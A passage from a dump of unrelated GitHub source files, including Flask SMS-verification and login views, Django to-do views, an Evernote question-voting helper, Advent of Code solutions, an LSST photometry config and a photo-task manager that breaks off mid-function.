at_free_start\n )\n l['att_M'] = att_M = \\\n att_maints_no_last.vfilter(lambda x: p_pos[x[1]] + max_elapsed < len(periods))\n\n l['t_at_M'] = t_at_M = att_M.to_dict(result_col=2, is_list=True)\n l['t1_at2'] = t1_at2 = att.to_dict(result_col=1, is_list=True).fill_with_default(l['at'], [])\n\n # now, we want to avoid recalculating domains...\n my_options = copy.deepcopy(options)\n my_options['calculate_domains'] = False\n solution = model.ModelANOR.solve(self, my_options)\n return solution\n","repo_name":"pchtsp/optima","sub_path":"python/solvers/model_anor_fixingLP.py","file_name":"model_anor_fixingLP.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12890201056","text":"import random\nimport re\nfrom datetime import datetime\n\nfrom flask import request, current_app, make_response, jsonify, session\nfrom flask_restful import Api, Resource, reqparse\n\nfrom project import db\nfrom project.libs.captcha.captcha import captcha\nfrom project.libs.yuntongxun.ccp_sms import CCP\nfrom project.models.models import User\nfrom project.utils import constants\nfrom project.utils.response_code import RET\nfrom . import verify_blueprint\n\nverify_api = Api(verify_blueprint)\n\n\nclass ImageCodeResource(Resource):\n \"\"\"获取图片验证码\"\"\"\n def get(self):\n # 验证码编号\n code_id = request.args.get('code_id')\n # 生成验证码\n text, image = captcha.generate_captcha()\n try:\n # 保存验证码\n current_app.redis_store.setex('img_' + code_id, constants.IMAGE_CODE_REDIS_EXPIRES, text)\n except Exception as e:\n current_app.logger.error(e)\n return make_response(jsonify(errno=RET.DATAERR, errmsg='保存图形验证码失败'))\n\n response = make_response(image)\n response.headers['Content-Type'] = 'image/jpg'\n return response\n\n\ndef check_mobile(value):\n\n if not re.match(r'1[3-9]\\d{9}', value):\n raise ValueError('手机号不正确')\n return value\n\n\nclass SmsCodeResource(Resource):\n \"\"\"短信验证码\"\"\"\n def post(self):\n\n parse = reqparse.RequestParser()\n parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n parse.add_argument('image_code', location='json', required=True)\n parse.add_argument('image_code_id', location='json', required=True)\n\n args = parse.parse_args()\n\n mobile = args.get('mobile')\n image_code = args.get('image_code')\n image_code_id = args.get('image_code_id')\n\n # 提取发送短信的标记 60秒避免频繁请求短信验证码\n send_flag = current_app.redis_store.get('send_flag_%s' % mobile)\n # 判断发送短信的标记是否存在(如果存在:频繁发送短信。反之,频率正常)\n if send_flag:\n return jsonify(errno=RET.DATAEXIST, errmsg=\"发送短信过于频繁\")\n\n try:\n server_image_code = current_app.redis_store.get('img_' + image_code_id)\n if server_image_code:\n server_image_code = server_image_code.decode()\n current_app.redis_store.delete('img_' + image_code_id)\n else:\n return jsonify(errno=RET.NODATA, errmsg=\"验证码已过期\")\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"获取图片验证码失败\")\n\n if image_code.lower() != server_image_code.lower():\n return jsonify(errno=RET.DATAERR, errmsg=\"验证码输入错误\")\n\n try:\n user = User.query.filter_by(mobile=mobile).first()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"数据库查询错误\")\n if user:\n # 该手机已被注册\n return jsonify(errno=RET.DATAEXIST, errmsg=\"该手机已被注册\")\n\n # 生成短信验证码:生成6位数验证码\n sms_code = '%06d' % random.randint(0, 999999)\n current_app.logger.info('短信验证码为:' + sms_code)\n\n current_app.redis_store.setex('sms_%s' % mobile, constants.SMS_CODE_REDIS_EXPIRES, sms_code)\n current_app.redis_store.setex('send_flag_%s' % mobile, constants.SEND_SMS_CODE_INTERVAL, 1)\n\n # 发送短信验证码\n CCP().send_template_sms(mobile, [sms_code, constants.SMS_CODE_REDIS_EXPIRES // 60], 1)\n\n return jsonify(errno=RET.OK, errmsg=\"发送成功\")\n\n\nclass RegisterResource(Resource):\n \"\"\"注册\"\"\"\n def post(self):\n\n parse = reqparse.RequestParser()\n parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n parse.add_argument('smscode',location='json', required=True)\n parse.add_argument('password', location='json', required=True)\n\n args = parse.parse_args()\n\n mobile = args.get('mobile')\n smscode = args.get('smscode')\n password = args.get('password')\n\n try:\n server_smscode = current_app.redis_store.get('sms_%s' % mobile)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"获取本地验证码失败\")\n\n if not server_smscode:\n # 短信验证码过期\n return jsonify(errno=RET.NODATA, errmsg=\"短信验证码过期\")\n\n if smscode != server_smscode.decode():\n return jsonify(errno=RET.DATAERR, errmsg=\"短信验证码错误\")\n\n try:\n current_app.redis_store.delete('sms_%s' % mobile)\n except Exception as e:\n current_app.logger.error(e)\n\n user = User()\n user.nick_name = mobile\n user.mobile = mobile\n user.password = password\n\n try:\n db.session.add(user)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DATAERR, errmsg=\"数据保存错误\")\n\n # 状态保持\n session[\"user_id\"] = user.id\n session[\"nick_name\"] = user.nick_name\n session[\"mobile\"] = user.mobile\n\n return jsonify(errno=RET.OK, errmsg=\"OK\")\n\n\nclass LoginResource(Resource):\n \"\"\"登录\"\"\"\n def post(self):\n\n parse = reqparse.RequestParser()\n parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n parse.add_argument('password', location='json', required=True)\n args = parse.parse_args()\n\n mobile = args.get('mobile')\n password = args.get('password')\n\n try:\n user = User.query.filter_by(mobile=mobile).first()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询数据错误\")\n\n if not user:\n return jsonify(errno=RET.USERERR, errmsg=\"用户不存在\")\n\n if not user.check_passowrd(password):\n return jsonify(errno=RET.PWDERR, errmsg=\"密码错误\")\n\n session[\"user_id\"] = user.id\n session[\"nick_name\"] = user.nick_name\n session[\"mobile\"] = user.mobile\n\n # 逻辑优化:如果是管理员进入到前台页面,状态保持信息中需要有is_admin\n if user.is_admin:\n session['is_admin'] = True\n\n user.last_login = datetime.now()\n\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n\n return jsonify(errno=RET.OK, errmsg=\"OK\")\n\n\nclass LogoutResource(Resource):\n \"\"\"退出登录\"\"\"\n def post(self):\n\n session.pop('user_id', None)\n session.pop('nick_name', None)\n session.pop('mobile', None)\n session.pop('is_admin', None)\n # 返回结果\n return jsonify(errno=RET.OK, errmsg=\"OK\")\n\n\nverify_api.add_resource(ImageCodeResource, '/image_code')\nverify_api.add_resource(SmsCodeResource, '/sms_code')\nverify_api.add_resource(RegisterResource, '/register')\nverify_api.add_resource(LoginResource, '/login')\nverify_api.add_resource(LogoutResource, '/logout')\n","repo_name":"Noah-Smith-wgp/zixun","sub_path":"project/apps/verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37530154514","text":"from evernote.api.client import EvernoteClient\nfrom evernote.edam.notestore import NoteStore\nimport evernote.edam.type.ttypes as Types\nfrom evernote.edam.type.ttypes import NoteSortOrder\nfrom Question import Question\nfrom Presentation import Presentation\nimport auth\n\nclient = EvernoteClient(token = auth.dev_token) # this token will be the\n # token of presenter\nNOTE_STORE = client.get_note_store()\n\ndef get_sorted_questions(guid): # guid of the notebook\n questions = get_questions(guid)\n questions.sort(key = lambda x: x.votes)\n questions.reverse()\n return questions\n\ndef get_questions(guid): # guid of the notebook\n questions = []\n noteFilter = NoteStore.NoteFilter(order=NoteSortOrder.UPDATED)\n noteFilter.notebookGuid = guid\n spec = NoteStore.NotesMetadataResultSpec()\n spec.includeTitle = True\n notes = NOTE_STORE.findNotesMetadata(auth.dev_token, noteFilter, 0 , 100, spec)\n for note in notes.notes:\n votes = get_votes(note.guid)\n questions += [ Question(note.title, '', votes,note.guid, NOTE_STORE) ]\n return questions\n\ndef get_votes(guid):\n return int(NOTE_STORE.getNoteApplicationDataEntry(auth.dev_token, guid, \"votes\"))\n\ndef get_presentation(guid):\n notebook_title = NOTE_STORE.getNotebook(auth.dev_token, guid).name\n notebook_questions = get_questions(guid)\n return Presentation(notebook_title, notebook_questions, guid)\n\ndef make_question(question_text, guid): # guid of the notebook to add to\n note = Types.Note()\n note.title = question_text\n note.content = ''\n note.content += ''\n note.notebookGuid = guid\n try:\n note = NOTE_STORE.createNote(note)\n except Exception:\n return None\n NOTE_STORE.setNoteApplicationDataEntry(auth.dev_token, note.guid, \"votes\", \"1\")\n question = Question(question_text, '', 1, note.guid, NOTE_STORE)\n return question\n\ndef make_presentation(title):\n notebook = Types.Notebook()\n notebook.name = title\n try:\n return NOTE_STORE.createNotebook(auth.dev_token, notebook).guid\n except Exception:\n return None\n\ndef gen_student_evernote(notebook_guid, token): # guid of the notebook containing q's\n questions = get_sorted_questions(notebook_guid)\n presentation = get_presentation(notebook_guid)\n new_note_text = \"\"\n for i in range(5 if len(questions) > 5 else len(questions)):\n new_note_text += \"\" + questions[i].question + \" (\" + str(questions[i].votes) + \" votes)

\"\n note = Types.Note()\n note.title = 'Top Questions from ' + presentation.title\n note.content = ''\n note.content += '' + new_note_text + ''\n client = EvernoteClient(token=token)\n student_note_store = client.get_note_store()\n student_note_store.createNote(token, note)\n\ndef get_question_by_guid(guid):\n note = NOTE_STORE.getNote(auth.dev_token, guid, False, False, False, False)\n return Question(note.title, '', get_votes(guid), guid, NOTE_STORE)\n","repo_name":"kklin/quak","sub_path":"quak/quakapp/Quak.py","file_name":"Quak.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39438852249","text":"\n\nfrom ast import arg\nimport json\nimport os\nfrom random import shuffle\nfrom sys import path\n\n\n\ndef build_json(args):\n if args.n_keyword == 35:\n vocab = ['yes', 'no', 'up', 'down', 'left', 'right', 'on', 'off', 'stop', 'go',\n 'zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine',\n 'bed', 'bird', 'cat', 'dog', 'happy', 'house', 'marvin', 'sheila', 'tree', 'wow',\n 'backward', 'forward', 'follow', 'learn', 'visual']\n elif args.n_keyword == 12:\n vocab = ['yes', 'no', 'up', 'down', 'left', 'right', 'on', 'off', 'stop', 'go','unknown','silence']\n else:\n raise ValueError(\"Number o keyword must be 35 or 12\")\n #mở các list training, validation, testing,bajckground\n with open(os.path.join(args.data_dir,'training_list.txt'),'r') as training_list:\n training_set = [line.strip('\\n') for line in training_list]\n with open(os.path.join(args.data_dir,'validation_list.txt'),'r') as validation_list:\n validation_set = [line.strip('\\n') for line in validation_list]\n with open(os.path.join(args.data_dir,'testing_list.txt'),'r') as testing_list:\n testing_set = [line.strip('\\n') for line in testing_list] \n with open(os.path.join(args.data_dir,'background_list.txt'),'r') as background_list:\n background_set = [line.strip('\\n') for line in background_list] \n\n print(len(training_set) ,len(validation_set), len(testing_set), len(background_set))\n print(f\"Building json files for {args.n_keyword} keywords\")\n\n #tạo file json\n ftrain = open(os.path.join(args.data_dir,'train'+'_'+ str(args.n_keyword)+'.json'),'w')\n fval = open(os.path.join(args.data_dir,'validation'+'_'+ str(args.n_keyword)+'.json'),'w')\n ftest = open(os.path.join(args.data_dir,'test'+'_'+ str(args.n_keyword)+'.json'),'w')\n fnoise = open(os.path.join(args.data_dir,'noise.json'),'w')\n freverb = open(os.path.join(args.data_dir,'reverb.json'),'w')\n\n #tạo nội dung cho file json\n for word in vocab:\n if word == 'unknown':\n unknown_word = ['backward', 'bed', 'bird', 'cat', 'dog',\n 'eight', 'five', 'follow', 'forward', 'four',\n 'happy', 'house', 'learn', 'marvin', 'nine',\n 'one', 'seven', 'sheila', 'six', 'three',\n 'tree', 'two', 'visual', 'wow', 'zero']\n\n for unk_word in unknown_word:\n count = 0\n for line in training_set:\n if unk_word + '/' in line:\n dir = os.path.join(os.path.join(args.data_dir,line))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,ftrain)\n ftrain.write('\\n')\n count += 1\n if count == 120:\n break\n for unk_word in unknown_word:\n count = 0\n for line in validation_set:\n if unk_word + '/' in line:\n dir = os.path.join(os.path.join(args.data_dir,line))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,fval)\n fval.write('\\n')\n count += 1\n if count == 15:\n break \n\n for unk_word in unknown_word:\n count = 0\n for line in testing_set:\n if unk_word + '/' in line:\n dir = os.path.join(os.path.join(args.data_dir,line))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,ftest)\n ftest.write('\\n')\n count += 1\n if count == 15:\n break \n\n elif word =='silence':\n shuffle(background_set)\n for part in background_set[:2800]:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,ftrain)\n ftrain.write('\\n')\n for part in background_set[2800:3200]:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,fval)\n fval.write('\\n')\n for part in background_set[3200:3600]:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict={'file':dir,'text': word}\n json.dump(json_dict,ftest)\n ftest.write('\\n')\n \n else:\n for part in training_set:\n if word +'/' in part:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,ftrain)\n ftrain.write('\\n')\n for part in validation_set:\n if word +'/' in part:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,fval)\n fval.write('\\n')\n for part in testing_set:\n if word +'/' in part:\n dir = os.path.join(os.path.join(args.data_dir,part))\n json_dict = {'file':dir,'text':word}\n json.dump(json_dict,ftest)\n ftest.write('\\n')\n noise_folder = os.path.join(args.data_dir,\"RIRS_NOISES\",'noise')\n reverb_folder = os.path.join(args.data_dir,\"RIRS_NOISES\",\"reverb\")\n for part in os.listdir(noise_folder):\n dir = os.path.join(os.path.join(noise_folder,part))\n json_dict = {'file':dir}\n json.dump(json_dict,fnoise)\n fnoise.write('\\n')\n for part in os.listdir(reverb_folder):\n dir = os.path.join(os.path.join(reverb_folder,part))\n json_dict = {'file':dir}\n json.dump(json_dict,freverb)\n freverb.write('\\n') \n \n ftrain.close()\n ftest.close()\n fval.close()\n fnoise.close()\n freverb.close()\n\n return ftrain,fval,ftest,fnoise,freverb\n \n\n \n\n\n\n\n","repo_name":"tuannvhust/keywordspotting_using_deep_learning","sub_path":"scenario/build_json.py","file_name":"build_json.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"28670389415","text":"import random as np\n\n# on a une chaine de caractère\n# on transforme la chaine de caractère en une liste de mots avec la méthode split()\n# ensuite on génère aléatoirement un index pour tirer un mot aléatoire dans note liste de mots\n# recupération du mot aléatoire\n\nnb_life = 5\n\nwords = \"abuser crottes fleches continental babiole etoile bougie coup coeur malade rova entretien chauvin arnoux\"\n\nwords_list = words.split()\n\nnb_alea = np.randint(0, len(words_list)-1)\n\nsecret_word = words_list[nb_alea]\n\n# dictinaire contenant les info necessaire pour le jeux\n\ndictionnaire = {\n\n \"secret_word\": secret_word,\n \"guess_word\": \"_\" * len(secret_word),\n \"life\": nb_life\n\n}\n\nprint(f\"{dictionnaire['guess_word']} | vie= {dictionnaire['life']}\")\n\nwhile True:\n\n enter_caract = input(\"Enter un caractère > \")\n if enter_caract in dictionnaire[\"secret_word\"] and enter_caract not in dictionnaire['guess_word']:\n\n list_of_caract = list(dictionnaire['guess_word'])\n for index, current_letter in enumerate(dictionnaire[\"secret_word\"]):\n if current_letter == enter_caract:\n list_of_caract[index] = enter_caract\n dictionnaire[\"guess_word\"] = \"\".join(list_of_caract)\n\n elif enter_caract not in dictionnaire[\"secret_word\"]:\n dictionnaire[\"life\"] -= 1\n print(f\"{dictionnaire['guess_word']} | vie= {dictionnaire['life']}\")\n\n if \"_\" not in dictionnaire['guess_word']:\n print(\n f\"Felicitation vous avez trouvé le mot: {dictionnaire['secret_word']}\")\n\n break\n elif dictionnaire['life'] < 1:\n print(\n f\"Vous avez perdu le mot est: {dictionnaire['secret_word']}\")\n break\n","repo_name":"RovaEncoder/Python_learning_project","sub_path":"pendu_game.py","file_name":"pendu_game.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"778841967","text":"import os.path\n\nfrom lsst.meas.base import CircularApertureFluxAlgorithm\n\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"apertures.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"kron.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"convolvedFluxes.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"gaap.py\"))\nconfig.load(os.path.join(os.path.dirname(__file__), \"cmodel.py\"))\n\nconfig.measurement.slots.gaussianFlux = None\n\nconfig.measurement.plugins['base_PixelFlags'].masksFpCenter.append('BRIGHT_OBJECT')\nconfig.measurement.plugins['base_PixelFlags'].masksFpAnywhere.append('BRIGHT_OBJECT')\n\nconfig.catalogCalculation.plugins.names = [\"base_ClassificationExtendedness\"]\nconfig.measurement.slots.psfFlux = \"base_PsfFlux\"\n\ndef doUndeblended(config, algName, fluxList=None):\n \"\"\"Activate undeblended measurements of algorithm\n\n Parameters\n ----------\n algName : `str`\n Algorithm name.\n fluxList : `list` of `str`, or `None`\n List of flux columns to register for aperture correction. If `None`,\n then this will be the `algName` appended with `_instFlux`.\n \"\"\"\n if algName not in config.measurement.plugins:\n return\n if fluxList is None:\n fluxList = [algName + \"_instFlux\"]\n config.measurement.undeblended.names.add(algName)\n config.measurement.undeblended[algName] = config.measurement.plugins[algName]\n for flux in fluxList:\n config.applyApCorr.proxies[\"undeblended_\" + flux] = flux\n\n\ndoUndeblended(config, \"base_PsfFlux\")\ndoUndeblended(config, \"ext_photometryKron_KronFlux\")\ndoUndeblended(config, \"base_CircularApertureFlux\", []) # No aperture correction for circular apertures\ndoUndeblended(config, \"ext_convolved_ConvolvedFlux\",\n config.measurement.plugins[\"ext_convolved_ConvolvedFlux\"].getAllResultNames())\ndoUndeblended(config, \"ext_gaap_GaapFlux\",\n config.measurement.plugins[\"ext_gaap_GaapFlux\"].getAllGaapResultNames())\n# Disable registration for apCorr of undeblended convolved; apCorr will be done through the deblended proxy\nconfig.measurement.undeblended[\"ext_convolved_ConvolvedFlux\"].registerForApCorr = False\nconfig.measurement.undeblended[\"ext_gaap_GaapFlux\"].registerForApCorr = False\n","repo_name":"lsst/obs_subaru","sub_path":"config/forcedPhotCoadd.py","file_name":"forcedPhotCoadd.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"40451416665","text":"def partition(arr,l,r):\n p=arr[l]\n i,j=l,r\n while i<=j:\n while i<=j and arr[i]<=p: i+=1\n while i<=j and arr[j]>=p: j-=1\n if i<=j:\n arr[i],arr[j]=arr[j],arr[i]\n arr[l],arr[j]=arr[j],arr[l]\n return j\ndef quickSort(arr,l,r):\n if l x1:\n x1 += 1\n elif x2 < x1:\n x1 -= 1\n\n if y2 > y1:\n y1 += 1\n elif y2 < y1:\n y1 -= 1\n\n grid[y1][x1] += 1\n\n\nif __name__ == '__main__':\n testing = False\n\n # Reads lines into a list input\n print('Reading hydrothermal data...')\n file = 'testinput.txt' if testing else 'input.txt'\n with open(file) as f:\n input = []\n for i in f.readlines():\n coords = []\n for n in i.strip().split(' -> '):\n coords.append(list(map(int, n.split(','))))\n input.append(coords)\n\n # Creates array from input\n input = np.array(input)\n grid = np.zeros((input.max() + 1, input.max() + 1), np.int16)\n\n # Part 1 solution\n for i in input:\n addLines(grid, i, True)\n print(f'Warning: Hydrothermal temperatures are dangerously high at {(grid >= 2).sum()} points.',\n 'It is strongly recommended that you turn back now.')\n\n # Part 2 solution\n grid = np.zeros((input.max() + 1, input.max() + 1), np.int16)\n for i in input:\n addLines(grid, i, False)\n print('Warning: Deeper analysis has reveal that hydrothermal temperatures are dangerously high at',\n f'{(grid >= 2).sum()} points. Are you sure whatever you are doing is worth it?')\n","repo_name":"ColonialDagger/AoC2021","sub_path":"Day 5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17800454499","text":"from datetime import date\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom home.forms import CreateNewIssue\nfrom home.models import Issue\nfrom .models import Issue\nimport json\nfrom django.core import serializers\nfrom django.forms.models import model_to_dict\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\n# Create your views here.\n\n\n@login_required(login_url='login')\ndef home(request):\n issues = Issue.objects.filter(user=request.user)\n context = {'issues': issues}\n return render(request, 'home/home.html', context)\n\n\n@login_required(login_url='login')\ndef get_issue_by_id(request, issue_id):\n _issue = model_to_dict(Issue.objects.get(pk=issue_id))\n _issue[\"create_date\"] = str(_issue[\"create_date\"])\n _issue[\"finish_date\"] = _issue[\"finish_date\"] if _issue[\"finish_date\"] is None else str(_issue[\"finish_date\"])\n _issue[\"start_date\"] = _issue[\"start_date\"] if _issue[\"start_date\"] is None else str(_issue[\"start_date\"])\n return HttpResponse(json.dumps(_issue))\n\n\n@login_required(login_url='login')\ndef post_new_issue(request):\n if request.method == \"POST\":\n data = json.loads(request.body.decode('utf-8'))\n data[\"create_date\"] = date.today()\n data[\"user_id\"] = request.user.id\n _data = Issue()\n _data.__dict__.update(data)\n _data.save()\n result = {\"status_code\": 1, \"status\": \"success\"}\n return HttpResponse(json.dumps(result))\n\n\n@login_required(login_url='login')\ndef new_issue(request):\n if request.method == \"POST\":\n form = CreateNewIssue(request.POST)\n if form.is_valid():\n t = form.save(commit=False)\n t.user = request.user\n t.create_date = date.today()\n t.save()\n return redirect('home')\n else:\n form = CreateNewIssue()\n return render(request, 'home/new_issue.html', {\"form\": form})\n\n\n@login_required(login_url='login')\ndef issue(request, issue_id):\n showed_issue = Issue.objects.get(pk=issue_id)\n return render(request, 'home/issue.html', {\"issue\": showed_issue})\n\n\ndef issue_edit(request, issue_id):\n issue_by_id = Issue.objects.get(pk=issue_id)\n if request.method == \"POST\":\n form = CreateNewIssue(request.POST, instance=issue_by_id)\n if form.is_valid():\n t = form.save(commit=False)\n t.user = request.user\n t.create_date = date.today()\n t.save()\n return redirect('home')\n else:\n showed_issue = Issue.objects.get(pk=issue_id)\n form = CreateNewIssue(instance=showed_issue)\n return render(request, 'home/new_issue.html', {\"form\": form})\n","repo_name":"emincankirmizi/django-todo-jira","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7680114910","text":"import copy\nfrom math import gcd\n\ndata = [x[1:-2] for x in open(\"input.txt\").readlines()]\n\norig_universe = []\n\n\ndef _compare_velocity(a, b):\n\treturn 0 if a == b else ((a - b) // abs(a - b))\n\n\nclass Planet:\n\tdef __init__(self, position, velocity=(0, 0, 0,)):\n\t\tself.position = position\n\t\tself.velocity = velocity\n\n\tdef update_velocity(self, other):\n\t\tself.velocity = tuple(self.velocity[i] - _compare_velocity(self.position[i], other.position[i]) for i in range(3))\n\n\tdef apply_velocity(self):\n\t\tself.position = tuple(x + y for x, y in zip(self.position, self.velocity))\n\n\tdef get_potential_energy(self):\n\t\treturn sum(abs(x) for x in self.position)\n\n\tdef get_kinetic_enerty(self):\n\t\treturn sum(abs(x) for x in self.velocity)\n\n\tdef get_total_energy(self):\n\t\treturn self.get_potential_energy() * self.get_kinetic_enerty()\n\n\ndef populate_planets():\n\tfor d in data:\n\t\tpositions = d.split(',')\n\t\torig_universe.append(Planet((int(positions[0].split('=')[1]), int(positions[1].split('=')[1]), int(positions[2].split('=')[1]),)))\n\n\ndef step_forward(planets):\n\tfor i, planet in enumerate(planets):\n\t\tfor j in range(i + 1, len(planets)):\n\t\t\tplanet.update_velocity(planets[j])\n\t\t\tplanets[j].update_velocity(planet)\n\t\tplanet.apply_velocity()\n\n\ndef part_one():\n\tplanets = copy.deepcopy(orig_universe)\n\tstep = 0\n\twhile step < 1000:\n\t\tstep_forward(planets)\n\t\tstep += 1\n\treturn sum(int(planet.get_total_energy()) for planet in planets)\n\n\ndef lcm(a, b):\n\treturn a * b // gcd(a, b)\n\n\ndef get_cycle_length(plane_idx):\n\tplanets = copy.deepcopy(orig_universe)\n\tcycle_elems = []\n\ti = 0\n\tstart_cycle_idx = 0\n\ttest_idx = 0\n\tstarted_cycle_test = False\n\twhile True:\n\t\tplane = str([planet.position[plane_idx] for planet in planets])\n\t\tif started_cycle_test:\n\t\t\ttest_idx += 1\n\t\t\tif cycle_elems[test_idx] != plane:\n\t\t\t\ttest_idx = 0\n\t\t\t\tstarted_cycle_test = False\n\t\t\t\tif cycle_elems[0] == plane:\n\t\t\t\t\tstarted_cycle_test = True\n\t\t\t\t\tstart_cycle_idx = i\n\t\t\tif test_idx == start_cycle_idx:\n\t\t\t\treturn start_cycle_idx\n\t\telse:\n\t\t\tif len(cycle_elems) > 0 and cycle_elems[0] == plane:\n\t\t\t\tstarted_cycle_test = True\n\t\t\t\tstart_cycle_idx = i\n\t\tcycle_elems.append(plane)\n\t\tstep_forward(planets)\n\t\ti += 1\n\n\ndef part_two():\n\tcycles = set()\n\tfor i in range(3):\n\t\tcycles.add(get_cycle_length(i))\n\tcycles = list(cycles)\n\treturn lcm(lcm(cycles[0], cycles[1]), cycles[2])\n\n\nif __name__ == '__main__':\n\tpopulate_planets()\n\tprint(part_one()) # 9958\n\tprint(part_two()) # 318382803780324\n","repo_name":"andrewpickett/advent-of-code","sub_path":"2019/python/day12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"979480417","text":"###############################################################################\n# All plump stuff for tasks.\n###############################################################################\nimport os\nimport config\nfrom plump import list_raw, list_jpg, filename_get_name, get_path, TASK, DIR_02\n\n\ndef get_actual():\n \"\"\"\n Returns dictionary with keys 'task' (foldername/taskname),\n 'name' (task name), 'folder' (folder name), 'path' (absolute path)\n of the actual task or None, if not set.\n \"\"\"\n try:\n settings = config.read_pickle()\n item = settings[TASK]\n\n if item is None or item == 'None':\n return None\n else:\n (folder, name) = item.rsplit('/', 1)\n path = get_task_path('{}'.format(item))\n task = {'task': item, 'name': name, 'folder': folder, 'path': path}\n return task\n except:\n print(\"get_actual() {}\".format(str('Exception occurred')))\n return None\n\n\ndef get_task_path(_task):\n \"\"\"\n Returns String with the absolute path of the task, or None\n if no actual task is set.\n Example:\n get_patch('w/20160101')\n return '/home/chris/fow/02_Progress/w/20160101'\n \"\"\"\n return get_path(DIR_02 + '/' + _task)\n\n\ndef check_actual():\n \"\"\"\n Analyse and write error message if actual path is not set or invalid.\n Returns True, if actual task is set and path exists. No print output.\n Returns False and write error message, if task not set or path\n does not exists.\n \"\"\"\n if get_actual() is None:\n print('No actual task. Use \"task --create \" to create one.')\n return False\n\n if not os.path.exists(get_task_path(get_actual()['task'])):\n print('Actual task points to invalid directory \"'\n + get_actual()['task'] +\n '\". Please set correct task with task -a .')\n return False\n\n return True\n\n\ndef move_corresponding_raws(jpg_dir, src_dir, dest_dir, dry_run):\n \"\"\"\n Moves all corresponding raws from source directory to destination directory.\n jpg_dir is the /jpg directory with corresponding jpg files.\n src_dir is the /row directory with raws to move.\n dest_dir is the target directory.\n \"\"\"\n # print('jpg=' + jpg_dir)\n # print('src=' + src_dir)\n # print('dst=' + dest_dir)\n\n jpgs = list_jpg(jpg_dir)\n # print(str(jpgs))\n\n raws = list_raw(src_dir)\n # print(str(raws))\n files = [r for r in raws for j in jpgs\n if filename_get_name(r) == filename_get_name(j)]\n\n if len(files) == 0:\n print('No RAWs to move.')\n return\n\n if dry_run:\n print('raw files to move (may already exists):')\n for each_file in files:\n print(str(each_file))\n else:\n for each_file in files:\n os.rename(src_dir + '/' + each_file, dest_dir + '/' + each_file)\n\n\ndef get_task_triple(offset):\n \"\"\"\n Returns dict with three tasks active, previous, next.\n Offset: offset value the actual task. For instance, offset=-1 would return\n the tasks -2, -1 and 0 relative to the active task.\n Actual: the active task or, if offset<> 0, the relative task. If\n there is no task active, the first task will be returned.\n If there is just one task, this one will be returned\n Returns None, if there are no tasks.\n next and previous are set to None, if there is only one task\n The task list is seen as a ring list, the task 'last+1' will be set to\n task 0 and, on the other hand, the task -1 will be set to last task.\n\n Example:\n return dict=(\n a_task=dict(subdir='family',task='holidays',active=true),\n p_task=dict(subdir='family',task='birthday',active=False),\n n_task=dict(subdir='weekly',task='20160101',active=False))\n\n \"\"\"\n tasks = []\n\n dir02 = [f.name for f in os.scandir(get_path(DIR_02)) if f.is_dir()]\n # dir02 = os.listdir(get_path(DIR_02))\n\n dir02.sort()\n active = get_actual()\n\n for each_folder in dir02:\n task_dirs = os.listdir(get_path(DIR_02) + '/' + each_folder)\n task_dirs.sort()\n for each_task in task_dirs:\n if active['folder'] == each_folder and \\\n active['name'] == each_task:\n is_active = True\n else:\n is_active = False\n\n tasks.append(dict(subdir=each_folder, task=each_task,\n active=is_active))\n\n # print('get_next_task() ' + str(tasks))\n\n # Just one or none task\n if len(tasks) == 0:\n return None\n elif len(tasks) == 1:\n return dict(a_task=tasks[0], n_task=None, p_task=None)\n\n # Find active item\n max_i = len(tasks) - 1\n\n active_i = 